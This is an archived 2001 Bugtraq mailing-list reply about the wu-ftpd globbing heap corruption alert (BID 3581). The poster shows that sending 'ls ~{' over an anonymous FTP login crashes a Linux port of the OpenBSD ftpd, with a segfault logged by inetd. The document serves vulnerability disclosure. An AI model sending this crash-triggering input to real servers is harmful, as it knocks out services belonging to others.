Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability
From: script0r (script0r@axenet.org)Date: 11/29/01
- Previous message: Larry W. Cashdollar: "Re: Xitami Webserver stores admin password in clear text."
- In reply to: Dave Ahmad: "*ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Next in thread: Andre Oppermann: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Reply: Andre Oppermann: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Reply: Todd C. Miller: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Reply: GiulioMaria Fontana: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Reply: Flavio Veloso: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-ID: <35684.24.51.95.122.1006990579.squirrel@mail.axenet.org> Date: Wed, 28 Nov 2001 18:36:19 -0500 (EST) Subject: Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability From: "script0r" <script0r@axenet.org> To: <bugtraq@securityfocus.com>
>
> --------------------------------------------------------------------------
-
> Security Alert
>
> Subject: Wu-Ftpd File Globbing Heap Corruption Vulnerability
> BUGTRAQ ID: 3581 CVE ID: CVE-MAP-NOMATCH
> Published: Nov 27, 2001 Updated: Nov 28, 2001
> 01:12:56
>
> Remote: Yes Local: No
> Availability: Always Authentication: Not Required
> Credibility: Vendor Confirmed Ease: No Exploit
> Available Class: Failure to Handle Exceptional Conditions
>
> Impact: 10.0 Severity: 10.0 Urgency: 8.2
>
> Last Change: Initial analysis.
> --------------------------------------------------------------------------
I am running the a linux port of the bsd ftpd and it might be vulnerable to
a similar attack,
ftp localhost
Connected to localhost.
220 playlandFTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
Name (localhost:user): ftp
331 Guest login ok, type your name as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
421 Service not available, remote server has closed connection
in inetd I find an error stating that the ftpd process has died unexpectedly
Nov 28 14:21:28 playland inetd[82]: pid 16341: exit signal 11
- Previous message: Larry W. Cashdollar: "Re: Xitami Webserver stores admin password in clear text."
- In reply to: Dave Ahmad: "*ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Next in thread: Andre Oppermann: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Reply: Andre Oppermann: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Reply: Todd C. Miller: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Reply: GiulioMaria Fontana: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Reply: Flavio Veloso: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
